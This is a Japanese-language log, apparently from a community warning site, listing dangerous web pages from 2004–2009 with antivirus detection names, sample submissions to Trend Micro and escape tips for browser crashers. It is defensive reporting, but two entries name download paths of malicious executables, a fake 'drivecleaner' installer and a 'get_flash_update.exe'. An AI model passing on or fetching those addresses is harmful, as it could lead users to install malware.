「中にはWToolsD.cfgという設定ファイルが入ってました。 ググってみるとスパイウェアが作り出すファイルと書いてるところもあります。 とりあえずウイルス反応はなしです。」 「調べて見ました。ブラウザがCool Web Search系のスパイウェアに乗ったられた時に、 そのスパイウェアがダウンロードするファイルの一つだそうです。 そのファイル単体では動作しないでしょうがわざわざダウンロードする価値はないかと。」 |
| [2005/10/08] | TELNETストーム。 |
| [2008/10/06] | ウィルス名:TROJ_ZLOB.AKT |
| [2008/10/06] | DL+解凍すると「UUSeeMediaCenter.exe」なるファイルが現れるが、ウィルス名:TSPY_ONLINEG.MIW を検出。 |
| [2004/07/14] | ブラウザが動きまわるページ?。脱出はAlt+F4で可能。上記URLと下記URLを互いに飛ぶ。 |
| [2006/11/04] | 海外アダルトサイト。1回目の確認の時のみウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC を検出。
閉じると これ を表示し、下のexeファイルをDLしようとする。 //cdn.drivecleaner.com/installdrivecleanerstart_jp.exe 上記のexeファイルは 2006/11/01 にトレンドマイクロ社に調査依頼中である。 2回目以降の確認では これ は表示されずに違うアダルトサイトを表示した。 |
| [2006/11/04] | 他の方の結果は以下の「」内。
「McAfee SiteAdvisor − エクスプロイト警告 の反応あり。 無効化して踏むと洋エロリンク系サイトが開き、 Trojan-Downloader.JS.Inor.a Exploit.Java.ByteVerify Trojan-Downloader.Java.OpenConnection.aa を Kaspersky で検出。」 |
| [2006/09/09] | 海外アダルトサイトだが、ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC を検出。
Kaspersky では Trojan-Downloader.HTML.Agent.au を検出するらしい。 |
| [2008/09/08] | 真っ白なページだが、ウィルス名:TSC_GENCLEAN+JS_EXPLOIT.CT を検出。 |
| [2008/09/08] | 真っ白なページだが、ウィルス名:TSC_GENCLEAN+VBS_PSYME.BKY を検出。 |
| [2008/09/08] | 真っ白なページだが、ウィルス名:TSC_GENCLEAN+JS_EXPLOIT.CV を検出。 |
| [2008/09/08] | 真っ白なページだが、ウィルス名:TSC_GENCLEAN+JS_REAPLAY.B を検出。 |
| [2008/10/12] | 真っ白なページ。バスター無反応だが、他社製ウィルス駆除ソフトでは反応があると思われる。 |
| [2008/10/23] | 真っ白なページだが、ウィルス名:JS_PSYME.CJA+HTML_ADODB.HB を検出。
このサイトは、'Microsoft Corporation'からの'Remote Data Services Data Control'アドオンを実行しようとしている。 |
| [2008/10/23] | ウィルス名:TROJ_EXCHANGE.Y |
| [2008/10/23] | こんな感じ のサイトだが、ウィルス名:HTML_AGENT.AVYZ を検出。 |
| [2008/10/23] | ウィルス名:TROJ_RENOS.AFT |
| [2008/11/27] | こんな感じ のサイトだが、ウィルス名:JS_PSYME.CJA+HTML_ADODB.HB を検出。
以下のファイルも落ちてくる。 //asp2win789.digiweb.com.br/get_flash_update.exe |
| [2006/05/06] | バスター無反応だが、以下のアンチウィルスソフトで反応。「リネージュ」に関するものと思われる。
AntiVir → TR/PSW.Lineage.WO Avast → Win32:Trojano-3372 Avira → TR/PSW.Lineage.WO BitDefender → Dropped:Generic.Malware.FM.20E62C2C DrWeb → Trojan.PWS.Lineage Ikarus → Backdoor.Win32.Rbot.AEU Kaspersky → Trojan-PSW.Win32.Lineage.aae McAfee → PWS-Lineage NOD32v2 → a variant of Win32/PSW.Lineage.DN |
| [2006/05/21] | こんな感じ のサイト。バスター無反応だが、Kaspersky で Exploit.HTML.UrlSpoof.a を検出するらしい。 |
| [2009/05/04] | リロードを繰り返す真っ白なサイトで、ウィルス名:HTML_DLOADR.AET を検出。 |
| [2005/11/12] | ウィルス名:SPYW_ATOMIC.B 。スパイウェアの種類の中でも厄介なキーロガーの部類に属する。
このexeは常駐型で「閲覧したWebページのURL」「実行されているアプリケーション」を記録し、外部に送信する。 |
| [2005/04/10] | ウィルス名:ADW_ISEARCH.B |
| [2008/11/22] | 偽装ウィルス駆除ソフトのページに飛ぶ。 |
| [2006/10/27] | 2006/10/15 にトレンドマイクロ社にDL+解凍して現れた「XPink.exe」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_CUTYGIRLS.K として検出するよう対応、とのこと。 実際に 2006/10/15 にDLしたファイルからウィルス名:DIAL_CUTYGIRLS.K を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_CUTYGIRLS.K を検出することを確認。 |
| [2006/10/21] | 2006/10/14 に落ちてきた「q387.exe」ファイルをトレンドマイクロ社に提出。
2006/10/19 にその結果の連絡があり、ウィルス名:DIAL_DIALER.KM として検出するよう対応、とのこと。 実際に 2006/10/14 にDLしたファイルからウィルス名:DIAL_DIALER.KM を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 新しいファイルに置き換えられているものと推測される。 |
| [2005/10/01] | TELNETストーム。アンチドートでウィルス名:Trojan.JS.NoCloseを検出。
ノートンでもトロイの木馬:Trojan Horseを検出するらしい。 TELNETストームは私の環境( IE 、FireFox 双方 )でも確認。CTRL+ALT+DELの親元のタスクの終了で脱出。 |
| [2005/10/02] | 他の方の結果は以下。
「時間帯によってブラクラに繋がる危険URLです。今現在は繋がりませんでした。繋がるときは繋がるようなので踏まないほうがいいでしょう。 漏れの環境では telnetストーム&アンチドートで Trojan.JS.NoClose 検出のブラクラです。 Trojan.JS.NoClose は you are an idiot などの窓増殖系ブラクラで検出されやすい物なので一時キャッシュ削除後他に何も検出されず。PCの挙動が変になっていなければ大丈夫だと思います。」 |
| [2008/10/23] | 2重拡張子。ウィルス名:TROJ_RENOS.ACO |
| [2008/11/27] | ウィルス名:TROJ_SPAMBOT.AS |
| [2006/08/02] | 2006/07/22 にDL+解凍して現れた「WinATS.dll」ファイルをトレンドマイクロ社に提出。
2006/07/26 に返事があり、それは以下。 「弊社では現在のパターンファイル以降にて、ウイルス名:ADW_MIRAR.G として検出するよう対応する予定となりますので、アップデートをお待ちくださいますようお願いいたします。」 2006/07/26 の時点ではバスター無反応であった。 しかし、今日、改めてファイルをDLしてみると、ウィルス名:ADW_MIRAR.G を検出することを確認。 |
| [2005/09/13] | 海外アダルトサイト。ブラクラ並に色々なアダルトサイトが開いていく。
開いたURLでは、ウィルス名:JAVA_BYTEVER.Aを検出するものや、怪しげなソフトのインストールを開始するものもある。 |
| [2005/09/16] | フラッシュでなくhtmlページ。 海外アダルトサイトがブラクラ的に開く。
バスター2005が反応したサイトもあるらしいが、私の環境では確認出来なかった。 他の方の結果は以下の「」内。 「Young Teens BBSという海外アダルトサイトが表示されましたが、ブラクラ並みにポップアップが出現。タスクマネージャで脱出後、IEのキャッシュをAntidoteでスキャンすると、 Trojan-Clicker.JS.Linker.c+Exploit.HTML.Mht+Exploit.Java.ByteVerify+Trojan-Downloader.Java.OpenConnection.aaを検出。」 「フラッシュと見せかけて別サイトへ飛ばす仕掛けがありました。ポップアップブロックをしてないとブラクラ並みに開いてえらいことになります。」 |
| [2005/09/24] | 再確認。何回か確認すると、ポプアプが3枚程度で終わる時もある。しかし、ブラクラ並に開く時もある。
どうやら、呼んでくるサイトがポプアプの開く途中からランダムで、それにより、症状が変わるらしい。 PC環境でポプアプ遮断だと、無害で終わると思われる。 |
| [2006/01/24] | 他の方の結果では、
「洋エロサイトに逝きます。リンク先クリックでKaspersky反応あり。Trojan-Downloader.JS.Psyme.bo 検出。」 |
| [2006/07/24] | ウィルス名:PE_Generic |
| [2006/08/03] | 2006/07/26 にトレンドマイクロ社にDL+解凍して現れた「easymessengerax.dll」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:ADW_SOLU180.AL として検出するよう対応とのこと。 当該URLからファイルをDLしてウィルス名:ADW_SOLU180.AL を検出することを確認。 |
| [2008/09/05] | DL+解凍すると「website.dll」なるファイルが現れるが、ウィルス名:TROJ_AGENT.RTL を検出。 |
| [2004/12/13] | ウィルス名:JAVA_BYTEVER.A。ウィルス憑きサイトが次々に開いていく。
しかも「閉じる」ボタンでは閉じれないサイトが多数。場合により、リソース不足に陥る。 |
| [2006/10/03] | 2006/09/20 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_VB.BLT として検出するよう対応、とのこと。 2006/09/20 にDLしたファイルからウィルス名:TROJ_VB.BLT を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:TROJ_VB.BLT を検出することを確認。 |
| [2006/10/03] | 2006/09/20 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_VB.BLS として検出するよう対応、とのこと。 2006/09/20 にDLしたファイルからウィルス名:TROJ_VB.BLS を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:TROJ_VB.BLS を検出することを確認。 |
| [2006/10/03] | 2006/09/20 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_VB.BLR として検出するよう対応、とのこと。 2006/09/20 にDLしたファイルからウィルス名:TROJ_VB.BLR を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:TROJ_VB.BLR を検出することを確認。 |
| [2006/09/20] | ウィルス名:BKDR_VB.WR |
| [2006/10/03] | 2006/09/20 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TSPY_VB.BLU として検出するよう対応、とのこと。 2006/09/20 にDLしたファイルからウィルス名:TSPY_VB.BLU を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 恐らく、新しいファイルに随時置き換えられるURLと推測される。 |